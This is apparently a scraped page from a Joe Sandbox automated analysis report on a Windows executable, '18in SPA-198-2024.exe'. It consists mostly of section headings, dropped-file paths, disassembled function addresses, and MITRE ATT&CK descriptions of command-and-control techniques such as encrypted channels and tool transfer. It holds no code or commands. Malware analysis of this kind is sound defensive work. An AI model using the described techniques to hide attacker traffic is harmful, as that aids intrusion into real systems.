Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 18in SPA-198-2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\18in SPA-198-2024.exe.log

C:\Users\user\AppData\Local\Temp\Ea64OHKq

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
18in SPA-198-2024.exe

Function 088B0378 Relevance: 6.9, Strings: 5, Instructions: 616
COMMON

Function 00B4D288 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Function 00B4D298 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 00B4AED9 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Function 00B458EC Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Function 00B444D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 088B0CA0 Relevance: 1.6, APIs: 1, Instructions: 83
windowCOMMON

Function 00B4D4D8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 088B3920 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 00B4D4E0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre